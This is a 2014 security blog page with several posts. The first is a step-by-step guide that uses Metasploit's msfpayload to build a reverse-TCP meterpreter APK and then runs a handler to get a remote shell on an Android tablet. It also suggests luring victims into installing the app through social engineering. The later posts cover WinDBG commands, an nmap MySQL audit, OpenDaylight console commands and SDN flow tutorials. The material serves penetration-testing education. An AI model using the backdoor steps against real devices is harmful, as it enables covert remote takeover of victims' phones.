Saturday, April 12, 2014

Hacking Android devices using Metasploit Backdoor

In this post we will see how to use backdoors generated by Metasploit to gain access into Android devices. I am using Nexux 7 Tablet as Victim.

SETUP DESCRIPTION
192.168.1.102 Victims IP Address (Android Nexus 7 Tablet)
192.168.1.140 Attackers IP Address (Metasploit)

I am using AirDroid App on Nexus 7 to download Metasploit backdoor (say, malicious App). In real scenarios we can host Web server with malicious app and entice users to install the app using various Social Engineering techniques.

BACKDOOR CREATION
Using Kali Linux with Metasploit Framework installed to generate the payload.
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.140 LPORT=4488 R > andr_bd.apk
msfpayload Metasploit command to create payloads (exe, java, apk etc.)
LHOST (local host) Attackers IP address for victim to connect back
LPORT (local port) port for victim to connect back
R msfpayload parameter indicates generation of raw payload
APK Application Package file

Successful execution of msfpayload will create andr_bd.apk App which is a Metasploit reverse TCP backdoor. When the app is installed on any android device, it will connect back to attackers IP address (192.168.1.140 here). Copy the App to Nexus 7 Tablet using AirDroid, install the app, successful installation will show the screen shot given below.

Before installing the App on Nexus 7 attacker need to run the following Metasploit commands for successful connection back of victim’s machine to attacker’s machine.
$ msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT
msf exploit(handler) > exploit 

We successfully got Metasploit’s meterpreter shell.

Post exploitation commands

Full paper can be accessed from
http://disects.com/whitepapers/Hacking_Android_devices_using_Metasploit_backdoors.pdf

Following articles might be of interest
http://blog.disects.com/2012/05/cain-and-abel-password-cracking.html
http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html

Saturday, April 5, 2014

WinDBG: Useful Debugging Commands

Open "Debugging Tools for Windows" help file
0:017> .hh

Display registers
0:017> r

Display Current Process
0:017> |.
0:017> |
Unassemble Function or address 0:017> uf mshtml!CElement::Doc 0:017> u address Assemble Address 0:017> a address Stack Trace 0:017> knL

Display Stack Backtrace
0:017> k
Trace (t) command executes a single instruction or source line and optionally displays the resulting values of all registers and flags. 0:017> t

Set break point
0:017> bp address

List break points
0:017> bl

Search for a String
0:017> s -a 0x00000000 L?7fffffff "disects"

dll is loaded between 03b10000 and 03fd000, search this area for 5d c3
0:014> s 03b10000 l 03fdd000 5d c3

On Intel machines, looking at the disassembled SEH code, you will see an instruction to move DWORD ptr from FS:[0]. This ensures that the exception handler is set up for the thread and will be able to catch errors when they occur. The opcode for this instruction is 64A100000000. If you cannot find this opcode, the
application/thread may not have exception handling at all.
Dump the TEB
0:017> d fs:[0]

Displays the current exception handler chain
0:017> !exchain

Display information about a local variable, global variable or data types(structures and unions). 
0:017> dt var1

array(arr1) under var1
0:017> dt var1 -a arr1

displays all types and globals under nt
0:017> dt nt!*

Looking at the default process heap, shows percentage of busy blocks
0:017> !heap -stat -h 00150000

Listing allocations with specific size
0:017> !heap -flt s fffe0

Display data at an address or a register
0:017> d 03694024-10
0:017> d esp
To which heap entry a particular address (here, 0c0c0c0c) belongs to 0:017> !heap -p -a 0c0c0c0c

Refer blow link for further reference
http://windbg.info/doc/1-common-cmds.html

Thursday, April 3, 2014

Nmap Scripting Engine: Auditing MySQL Server

Nmap is an Open Source tool for Network Mapping, Network Inventory and Security Auditing. Nmap uses raw IP packets to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
 
MySQL is an Open Source Relational Data Base Management Systems (RDBMS).
 
I am using Nmap TCP SYN scan to find all open ports.
 
Nmap Scripts are located at
/usr/share/nmap/scripts
on Kali Linux.
 
Below snapshot shows the scripts we used to audit MySQL Server. Nmap Script disclose critical information like username, usernames without password. cersion, dump of hashes etc.

 
To run all the scripts related to MySQL execute below command.
# nmap --script "mysql-*" target_ip
 
From the above snapshots replace 127.0.0.1 with the IP you want to scan/audit.
 

Wednesday, March 26, 2014

Opendaylight (ODL) Controller Debugging using OSGI Commands


Most of the commands will work with CPqD Switch, there are some limitations/bugs with OVSK.
Few commands work for openflowplugin and few for controller.

removeMeter
removeMeters
addMeter
addMeters
modifyMeter
modifyMeters
removeGroup
addGroup
modifyGroup
portDescStats
flowStats

tableStats
groupStats
meterStats
meterConfigStats
aggregateStats
descStats
addMDFlow

modifyMDFlow
removeMDFlow

startSync
addFlows
modifyFlows
removeFlows
modifyTable
addGroups
modifyGroups
removeGroups
tbegin

tcommit
trollback
cacheinfo
setLogLevel
getLogLevel
create
destroy
listen
unlisten
myController
getClusterNodes
listcaches
put
remove
dumper
get
listenActive
unlistenActive
putComplex
updateComplex
printUserLink
addUserLink
deleteUserLink
printNodeEdges
readflows
readflow
readports
readport
readtable
readdescr
modifyflow
removeflow
addflowv6
removeflowv6
umAddUser
umRemUser
umGetUsers
addAAAServer
removeAAAServer
printAAAServers
ofdumpstatsmgr
resetSwitchCapability
ofbw
txratewindow
ofstatsmgrintervals
prlh
prll
psl
pht
pet
ptick
pcc
ptm
psize
page
sage
eage
dage
scc
ecc
dcc
psnp
esnp
dsnp
spause
sdi
sports
addsw
remsw
pthrot
ethrot
dthrot
pem
bwfactor
px2r
px2rc
controllerShowQueueSize
controllerShowSwitches
controllerReset
controllerShowConnConfig
dumpPendingARPReqList
dumpFailedARPReqList
pencs
pdm
psc
pfc
psd
psp
psm
addContainer
createContainer
removeContainer
addContainerEntry
removeContainerEntry
addContainerFlow
removeContainerFlow
containermgrGetRoles
containermgrGetAuthorizedGroups
containermgrGetAuthorizedResources
containermgrGetResourcesForGroup
containermgrGetUserLevel
containermgrGetUserResources
saveConfig
api3ut
scheme


printNodes




Tuesday, March 25, 2014

OpenFlow 1.3 Protocol Packet Structure: OFPT_HELLO

OpenFlow protocol is used for communication between ODL Controller and Switches supporting OpenFlow (OVSK, CPqD, Cisco Switches(N3K, Cat3K etc.), Brocade, HP, Juniper etc.). Each OpenFlow message begins with OpenFlow header which has Version(0x04, 1 byte), Type(1 byte), length(2 bytes), transaction ID (4 bytes). In OF1.3 we have 30 different types of Messages which start with OFPT_

192.168.56.103        Controller
192.168.56.104        Mininet (OVSK)
192.168.56.102         Mininet (CPqD)



If Protocol field is seen as TCP instead of OpenFlow, right click on the packet of interest -> Decode As -> Transport tab -> select Openflow -> OK

Monday, March 24, 2014

SDN Opendaylight Controller: Add/Remove Flow Entries using REST


Start Controller
$ ./run.sh

Start Open vSwitches using Mininet
$ sudo mn --topo single,2 --controller remote,ip=192.168.56.101 --switch ovsk,protocols=OpenFlow13


192.168.56.101     Virtual Machine (VM) where Opendaylight(ODL) Controller is running
192.168.56.102     VM where Mininet is running

We will be using f206.xml for our testing.

Before using REST request Click on Basic Auth tab and configure username/password as admin/admin which are default credentials for accessing Controller GUI, click Refresh Headers. And configure Content-Type and Accept as shown below

To add a Flow Entry on to OpenvSwitch need to use PUT request method.

table_id, id tags of the XML will be part of REST request URL

http://192.168.56.101:8080/restconf/config/opendaylight-inventory:nodes/node/openflow:1/table/2/flow/133

Select raw-> XML as data format and copy f206.xml to the text body and click on Send tab. It should return us "200 OK" status code which indicates Flow is successfully sent to Controller without any issues, and the information will be saved in Controllers cache(Configuration Data Store).



Flow being successfully sent to Switch or not can be verified using ovs-ofctl command.

To remove a flow from Switch using REST request use DELETE request instead of PUT.

Following articles might be of interested
SDN Opendaylight Controller: Add/Remove Flow Entries using OSGI CLI
http://blog.disects.com/2014/03/sdn-opendaylight-controller-addremove_24.html

ovs-ofctl OVS action commands for OpenFlow 1.3
http://blog.disects.com/2014/01/ovs-ofctl-ovs-action-commands-for.html

ovs-ofctl commands on OpenFlow 1.3 Mininet Open vSwitch (OVSK)
http://blog.disects.com/2014/01/ovs-ofctl-commands-on-openflow-13.html 

Interested in Ethical Hacking!
http://blog.disects.com/2012/05/cain-and-abel-password-cracking.html